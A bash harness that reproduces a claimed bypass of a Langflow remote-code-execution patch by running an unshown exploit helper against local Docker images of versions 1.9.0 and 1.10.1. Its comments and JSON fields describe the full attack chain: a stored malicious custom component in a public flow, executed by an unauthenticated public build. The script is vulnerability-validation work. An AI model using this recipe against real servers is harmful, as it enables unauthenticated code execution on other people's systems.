#!/bin/bash
set -euo pipefail

# CVE-2026-33017 VARIANT/BYPASS orchestrator.
#
# Bypass of the v1.9.0 "fix": the v1.9.0 patch removed the client-supplied 'data'
# parameter from POST /api/v1/build_public_tmp/{flow_id}/flow and hardcoded
# data=None so the public build loads the flow from the DB. Its only added gate is
# validate_flow_for_current_settings(flow.data), which is a NO-OP under the default
# allow_custom_components=true. So an attacker who stores a malicious custom
# component inside a PUBLIC flow (via POST /api/v1/flows/, using the AUTO_LOGIN
# superuser token - exactly the capability the original CVE repro already uses to
# create a public flow) can still get unauthenticated RCE: the public build loads
# that stored malicious flow from the DB and exec()'s the node code at graph-build
# time via prepare_global_scope()/eval_custom_component_code.
#
# This is the gap the upstream follow-up commit 626365f088
# "fix(security): run trusted server code on unauthenticated public flow builds"
# (released in v1.10.1, NOT in v1.9.0) was issued to close.
#
# This script tests the bypass against:
#   - langflowai/langflow:1.9.0  (CVE "fixed" version)  -> expect BYPASS (proof written)
#   - langflowai/langflow:1.10.1 (follow-up fix)         -> expect CLOSED (no proof / 400)
#
# Exit 0 = bypass reproduced on the CVE-claimed-fixed 1.9.0 (true bypass of the
#           claimed fix) and NOT reproduced on 1.10.1 (follow-up closes it).
# Exit 1 = bypass not reproduced on 1.9.0, or reproduced on 1.10.1 (regression).
# Exit 2 = environment/docker error (no valid test ran).

# Workspace root: PRUVA_ROOT when set and non-empty, otherwise the parent of the
# directory that contains this script.
ROOT="${PRUVA_ROOT:-$(cd "$(dirname "$0")/.." && pwd)}"
# All evidence for this variant is written under LOGS; the exploit helper and the
# JSON outputs of this script live under VARIANT_DIR.
LOGS="$ROOT/logs/vuln_variant"
VARIANT_DIR="$ROOT/vuln_variant"
# Must happen before the exec/tee redirection below, which opens a file in LOGS.
mkdir -p "$LOGS" "$VARIANT_DIR"

# Run from the workspace root for the rest of the script.
cd "$ROOT"

# Tee everything into the dedicated log (appended, not truncated) while still
# showing it on the terminal. Note that stderr is merged into stdout here, so
# from this point on both streams go through the same tee process.
exec > >(tee -a "$LOGS/reproduction_steps.log") 2>&1

# Images
CLAIMED_FIXED_IMAGE="langflowai/langflow:1.9.0"   # CVE says "fixed in 1.9.0" - we bypass it
FOLLOWUP_FIXED_IMAGE="langflowai/langflow:1.10.1"  # real follow-up fix that closes the bypass
# Number of independent attempts (fresh container each) run against each image.
CLAIMED_FIXED_ATTEMPTS=2
FOLLOWUP_FIXED_ATTEMPTS=2
# Port the langflow server is told to listen on inside each container
# (passed as LANGFLOW_PORT and --port).
PORT=7860

# Print all arguments as a single line on stdout, tagged with "[variant]".
log() {
  printf '%s\n' "[variant] $*"
}

# ---- project cache context (reference; we use Docker images for the product) ----
# Informational only: logs whether project_cache_context.json reports
# "prepared". The value does not influence the test itself.
CACHE_CTX="$ROOT/project_cache_context.json"
if [ -f "$CACHE_CTX" ]; then
  # The path is handed to Python through argv instead of being spliced into the
  # Python source, so a path containing a quote or backslash cannot break the
  # snippet. Any failure (python3 missing, unreadable or invalid JSON) falls
  # back to "False" on purpose: this probe must never abort the run.
  PREPARED=$(python3 -c 'import json,sys;print(json.load(open(sys.argv[1])).get("prepared",False))' "$CACHE_CTX" 2>/dev/null || echo False)
  log "project cache prepared=$PREPARED (using Docker images for the real product)"
else
  log "no project_cache_context.json; using Docker images for the real product"
fi

# Make sure a Docker image is available locally, pulling it when it is not.
# Arguments: $1 - image reference (repository:tag)
# Outputs:   progress messages via log; `docker pull` output on stdout/stderr
# Returns:   0 when the image is already present or was pulled successfully,
#            2 when the pull fails. Called at top level under `set -e`, a
#            failure therefore ends the script with status 2, the documented
#            "environment/docker error" code, instead of docker's own status
#            (which could be mistaken for "bypass not reproduced").
pull_image() {
  local image="$1"
  # Ask Docker for this exact reference instead of grepping the image list:
  # no regex interpretation of the dots in the tag, and no pipeline that can
  # fail spuriously under `pipefail` when grep -q closes the pipe early.
  if docker image inspect "$image" >/dev/null 2>&1; then
    log "image $image already present"
    return 0
  fi
  log "pulling $image ..."
  if ! docker pull "$image"; then
    log "ERROR: failed to pull $image"
    return 2
  fi
}

# Resolve and persist the exact build/version metadata a Docker image exposes, so
# the tested source identity is recorded (not just the tag).
# Globals:   LOGS (read)
# Arguments: $1 - image reference, $2 - role label used in the output file name
# Outputs:   writes $LOGS/<role>_image_identity.txt; logs its location
# Returns:   always 0; every probe is best-effort and failures are ignored so
#            that missing metadata never aborts the run.
record_image_identity() {
  local image="$1"
  local role="$2"
  local out="$LOGS/${role}_image_identity.txt"

  # Take the tag from the last path component only, so a registry port
  # ("host:5000/app:1.2") is not mistaken for the tag. A reference without a
  # tag is recorded as "latest", the tag Docker uses by default.
  local name="${image##*/}"
  local tag="latest"
  if [[ "$name" == *:* ]]; then
    tag="${name##*:}"
  fi

  {
    echo "image=$image"
    echo "tag=$tag"
    docker inspect "$image" --format '{{json .Config.Labels}}' 2>/dev/null || true
    echo "--- langflow version (from a throwaway container) ---"
    # Two independent probes: the module attribute and the installed package
    # metadata; either may be absent, hence the `|| true`.
    docker run --rm --entrypoint python "$image" -c "import langflow; print('langflow', getattr(langflow,'__version__','?'))" 2>/dev/null || true
    docker run --rm --entrypoint python "$image" -c "import importlib.metadata as m; print('version', m.version('langflow'))" 2>/dev/null || true
  } >"$out" 2>&1 || true
  log "image identity for $image -> $out"
}

# Run one bypass attempt against a fresh container of the given image.
# Globals:   LOGS, VARIANT_DIR, PORT (read)
# Arguments: $1 - role label (used in container and file names)
#            $2 - attempt number
#            $3 - Docker image to start
# Outputs:   under $LOGS: result_<role>_<n>.json (helper stdout),
#            result_<role>_<n>_stderr.log, proof_<role>_<n>.txt (only if the
#            container has /tmp/rce-proof), container_<role>_<n>.log
# Returns:   the exit status of the exploit helper run via `docker exec`
#            (callers count 0 as "bypass reproduced").
# Exits:     2 when the attempt could not be set up at all (token generation,
#            container start, or copying the helper failed).
#
# Why the explicit checks: this function is invoked as `if run_attempt ...`,
# and bash ignores `set -e` for every command inside a function called from a
# condition. Without them a container that never started would simply be
# counted as "bypass not reproduced" - which, for the follow-up image, reads
# as "the fix works" even though nothing was tested.
run_attempt() {
  local role="$1"
  local attempt="$2"
  local image="$3"
  local container="langflow-variant-${role}-${attempt}"
  local container_log="$LOGS/container_${role}_${attempt}.log"
  local token
  # Random per-attempt token handed to the helper via the TOKEN env variable.
  if ! token=$(python3 -c 'import secrets; print(secrets.token_hex(8))'); then
    log "ERROR: could not generate attempt token with python3"
    exit 2
  fi

  log "----------------------------------------------------------------------"
  log "attempt role=$role attempt=$attempt image=$image token=$token"
  log "----------------------------------------------------------------------"

  # Remove any leftover container with the same name from a previous run.
  docker rm -f "$container" >/dev/null 2>&1 || true
  log "$ docker run -d --rm --name $container -e LANGFLOW_AUTO_LOGIN=true -e LANGFLOW_PORT=$PORT -e LANGFLOW_HOST=0.0.0.0 $image python -m langflow run --host 0.0.0.0 --port $PORT --backend-only --no-open-browser"
  if ! docker run -d --rm --name "$container" \
    -e LANGFLOW_AUTO_LOGIN=true \
    -e LANGFLOW_PORT="$PORT" \
    -e LANGFLOW_HOST=0.0.0.0 \
    "$image" \
    python -m langflow run --host 0.0.0.0 --port "$PORT" --backend-only --no-open-browser \
    >"$container_log" 2>&1; then
    log "ERROR: failed to start container $container from $image (see $container_log)"
    docker rm -f "$container" >/dev/null 2>&1 || true
    exit 2
  fi

  # copy the variant exploit helper into the running container
  if ! docker cp "$VARIANT_DIR/variant_attempt.py" "$container:/tmp/variant_attempt.py"; then
    log "ERROR: failed to copy variant_attempt.py into $container"
    docker logs "$container" >"$container_log" 2>&1 || true
    docker rm -f "$container" >/dev/null 2>&1 || true
    exit 2
  fi

  log "running variant exploit helper inside $container (MODE=bypass) ..."
  # A non-zero helper status is an expected outcome, so capture it rather than
  # letting it abort anything.
  local rc=0
  docker exec -e ROLE="$role" -e TOKEN="$token" -e MODE=bypass "$container" python3 /tmp/variant_attempt.py \
    >"$LOGS/result_${role}_${attempt}.json" 2>"$LOGS/result_${role}_${attempt}_stderr.log" || rc=$?
  log "attempt $role/$attempt rc=$rc"

  # persist the proof file (if any) out of the container for evidence
  docker cp "$container:/tmp/rce-proof" "$LOGS/proof_${role}_${attempt}.txt" >/dev/null 2>&1 || true
  # capture container logs for this attempt (replaces the container id that
  # `docker run -d` wrote to the same file)
  docker logs "$container" >"$container_log" 2>&1 || true

  docker rm -f "$container" >/dev/null 2>&1 || true
  return "$rc"
}

log "CVE-2026-33017 VARIANT/BYPASS: stored-custom-component RCE on the public build path (defeats the 1.9.0 fix)"
log "logs: $LOGS"

# Preflight: every external tool this script relies on must be on PATH.
# A missing tool is an environment problem, reported with exit status 2.
for required_tool in docker python3 jq; do
  command -v "$required_tool" >/dev/null 2>&1 && continue
  log "ERROR: $required_tool not found in PATH"
  exit 2
done

# Fetch both images first, then record exact tested image identities
# (build/version metadata) for each of them.
pull_image "$CLAIMED_FIXED_IMAGE"
pull_image "$FOLLOWUP_FIXED_IMAGE"

record_image_identity "$CLAIMED_FIXED_IMAGE" "claimed_fixed"
record_image_identity "$FOLLOWUP_FIXED_IMAGE" "followup_fixed"

# ---- claimed-fixed (1.9.0): the bypass should reproduce here ----
# claimed_ok counts the attempts for which run_attempt returned success.
claimed_ok=0
for ((i = 1; i <= CLAIMED_FIXED_ATTEMPTS; i++)); do
  if run_attempt "claimed_fixed" "$i" "$CLAIMED_FIXED_IMAGE"; then
    ((claimed_ok += 1))
  fi
done

# ---- follow-up fixed (1.10.1): the bypass should NOT reproduce here ----
# followup_ok counts the attempts for which run_attempt returned success.
followup_ok=0
for ((i = 1; i <= FOLLOWUP_FIXED_ATTEMPTS; i++)); do
  if run_attempt "followup_fixed" "$i" "$FOLLOWUP_FIXED_IMAGE"; then
    ((followup_ok += 1))
  fi
done

log "----------------------------------------------------------------------"
log "RESULTS: bypass on CVE-claimed-fixed 1.9.0 = $claimed_ok/$CLAIMED_FIXED_ATTEMPTS  |  bypass on follow-up 1.10.1 = $followup_ok/$FOLLOWUP_FIXED_ATTEMPTS"
log "----------------------------------------------------------------------"

# Start from "not confirmed" and upgrade only when both conditions hold:
#  - every 1.9.0 attempt succeeded (the CVE "fixed" version is still RCE), AND
#  - no 1.10.1 attempt succeeded (the follow-up fix closes it),
# which shows the gap is real and specific to 1.9.0's incomplete fix.
OUTCOME="not_confirmed"
NOTES="Could not reproduce the expected 1.9.0-bypass / 1.10.1-closed divergence. claimed_ok=$claimed_ok followup_ok=$followup_ok"
if ((claimed_ok == CLAIMED_FIXED_ATTEMPTS && followup_ok == 0)); then
  OUTCOME="bypass_confirmed"
  NOTES="Bypass confirmed: stored-custom-component RCE reproduces on the CVE 'fixed' langflow:1.9.0 (proof written) and is closed by the v1.10.1 follow-up fix (no proof)."
fi
log "outcome=$OUTCOME"

# ---- proof artifacts list ----
# PROOF_ARTIFACTS holds every evidence file an attempt may have produced
# (paths relative to ROOT); EXISTING_ARTIFACTS keeps only those present on disk.
PROOF_ARTIFACTS=()
for i in $(seq 1 "$CLAIMED_FIXED_ATTEMPTS"); do
  PROOF_ARTIFACTS+=("logs/vuln_variant/result_claimed_fixed_${i}.json")
  PROOF_ARTIFACTS+=("logs/vuln_variant/proof_claimed_fixed_${i}.txt")
  PROOF_ARTIFACTS+=("logs/vuln_variant/container_claimed_fixed_${i}.log")
done
for i in $(seq 1 "$FOLLOWUP_FIXED_ATTEMPTS"); do
  PROOF_ARTIFACTS+=("logs/vuln_variant/result_followup_fixed_${i}.json")
  PROOF_ARTIFACTS+=("logs/vuln_variant/proof_followup_fixed_${i}.txt")
  PROOF_ARTIFACTS+=("logs/vuln_variant/container_followup_fixed_${i}.log")
done
EXISTING_ARTIFACTS=()
# The ${arr[@]+...} form expands to nothing for an empty array; a plain
# "${arr[@]}" on an empty array is an unbound-variable error under `set -u`
# on bash older than 4.4.
for a in ${PROOF_ARTIFACTS[@]+"${PROOF_ARTIFACTS[@]}"}; do
  if [ -f "$ROOT/$a" ]; then EXISTING_ARTIFACTS+=("$a"); fi
done
# With no existing artifacts, `printf '%s\n'` would still print one empty line
# and the manifest would list a bogus "" entry, so emit an empty JSON array.
if ((${#EXISTING_ARTIFACTS[@]} > 0)); then
  ARTIFACT_JSON=$(printf '%s\n' "${EXISTING_ARTIFACTS[@]}" | jq -R . | jq -s .)
else
  ARTIFACT_JSON='[]'
fi

# ---- runtime manifest ----
# The per-image flags report what was actually measured, using the same
# per-image criteria as the overall decision: 1.9.0 counts as bypassed when
# every attempt succeeded, 1.10.1 counts as bypassed when any attempt succeeded.
# Deriving them from OUTCOME instead would write false/false for a run where
# 1.9.0 reproduced but 1.10.1 reproduced as well, hiding both observations.
if [ "$claimed_ok" -eq "$CLAIMED_FIXED_ATTEMPTS" ]; then
  BYPASS_ON_CLAIMED_FIXED=true
else
  BYPASS_ON_CLAIMED_FIXED=false
fi
if [ "$followup_ok" -gt 0 ]; then
  BYPASS_ON_FOLLOWUP_FIXED=true
else
  BYPASS_ON_FOLLOWUP_FIXED=false
fi
ENTRY_DETAIL="POST /api/v1/build_public_tmp/{flow_id}/flow (stored-data bypass; no 'data' field in request body)"
BYPASS_STRATEGY="Store malicious CustomComponent code in a PUBLIC flow via POST /api/v1/flows/ (AUTO_LOGIN token), then trigger the unauthenticated public build which loads the stored flow from the DB and exec()'s the node code. v1.9.0 validate_flow_for_current_settings is a no-op under default allow_custom_components=true."
# --arg passes strings; --argjson passes values that are already JSON
# (the two booleans and the artifact array).
jq -n \
  --arg entrypoint_kind "api_remote" \
  --arg entrypoint_detail "$ENTRY_DETAIL" \
  --arg bypass_strategy "$BYPASS_STRATEGY" \
  --argjson bypass_on_claimed_fixed_1_9_0 "$BYPASS_ON_CLAIMED_FIXED" \
  --argjson bypass_on_followup_fixed_1_10_1 "$BYPASS_ON_FOLLOWUP_FIXED" \
  --argjson proof_artifacts "$ARTIFACT_JSON" \
  --arg notes "$NOTES" \
  '{
      entrypoint_kind: $entrypoint_kind,
      entrypoint_detail: $entrypoint_detail,
      bypass_strategy: $bypass_strategy,
      bypass_on_claimed_fixed_1_9_0: $bypass_on_claimed_fixed_1_9_0,
      bypass_on_followup_fixed_1_10_1: $bypass_on_followup_fixed_1_10_1,
      runtime_stack: ["docker","langflow","fastapi"],
      proof_artifacts: $proof_artifacts,
      notes: $notes
  }' > "$VARIANT_DIR/runtime_manifest.json"
log "wrote runtime manifest -> $VARIANT_DIR/runtime_manifest.json"

# ---- structured verdict ----
if [ "$OUTCOME" = "bypass_confirmed" ]; then
  VERDICT="confirmed"; SURFACE="api_remote"; IMPACT="code_execution"; CONF="high"
  CLAIM_BLOCK_JSON="null"
else
  VERDICT="not_confirmed"; SURFACE="api_remote"; IMPACT="none"; CONF="low"
  CLAIM_BLOCK_JSON='"could not reproduce bypass on 1.9.0 and/or follow-up 1.10.1 also vulnerable"'
fi
# Per-image flags come from the measured attempt counts rather than from the
# overall verdict: 1.9.0 is flagged when every attempt succeeded, 1.10.1 when
# any attempt succeeded. A hard-coded `false` for 1.10.1 would hide exactly the
# regression case ("reproduced on 1.10.1") this script is meant to detect.
if [ "$claimed_ok" -eq "$CLAIMED_FIXED_ATTEMPTS" ]; then
  VERDICT_BYPASS_CLAIMED=true
else
  VERDICT_BYPASS_CLAIMED=false
fi
if [ "$followup_ok" -gt 0 ]; then
  VERDICT_BYPASS_FOLLOWUP=true
else
  VERDICT_BYPASS_FOLLOWUP=false
fi
# --arg passes strings; --argjson passes values that are already JSON
# (claim_block_reason is either null or a quoted JSON string).
jq -n \
  --arg variant_outcome "$VERDICT" \
  --argjson claim_block_reason "$CLAIM_BLOCK_JSON" \
  --arg validated_surface "$SURFACE" \
  --arg observed_impact_class "$IMPACT" \
  --arg exploitability_confidence "$CONF" \
  --arg attacker_controlled_input "PUBLIC flow stored data containing a CustomComponent node with a top-level _rce=os.system(...) payload (created via POST /api/v1/flows/ with an AUTO_LOGIN superuser token)" \
  --arg trigger_path "POST /api/v1/flows/ (store malicious PUBLIC flow) -> POST /api/v1/build_public_tmp/{flow_id}/flow (no data) -> start_flow_build(data=None, source_flow_id) -> build_graph_from_db -> Graph.from_payload -> create_class -> prepare_global_scope -> exec" \
  --argjson bypass_on_claimed_fixed_1_9_0 "$VERDICT_BYPASS_CLAIMED" \
  --argjson bypass_on_followup_fixed_1_10_1 "$VERDICT_BYPASS_FOLLOWUP" \
  --arg notes "$NOTES" \
  '{
      variant_outcome: $variant_outcome,
      claim_block_reason: $claim_block_reason,
      validated_surface: $validated_surface,
      observed_impact_class: $observed_impact_class,
      exploitability_confidence: $exploitability_confidence,
      attacker_controlled_input: $attacker_controlled_input,
      trigger_path: $trigger_path,
      bypass_on_claimed_fixed_1_9_0: $bypass_on_claimed_fixed_1_9_0,
      bypass_on_followup_fixed_1_10_1: $bypass_on_followup_fixed_1_10_1,
      notes: $notes
  }' > "$VARIANT_DIR/validation_verdict.json"
log "wrote verdict -> $VARIANT_DIR/validation_verdict.json"

# Translate the outcome into the process exit status:
# 0 when the bypass was confirmed, 1 for anything else.
case "$OUTCOME" in
  bypass_confirmed)
    log "VARIANT/BYPASS CONFIRMED (1.9.0 still RCE; 1.10.1 closes it)"
    exit 0
    ;;
  *)
    log "VARIANT/BYPASS NOT CONFIRMED"
    exit 1
    ;;
esac
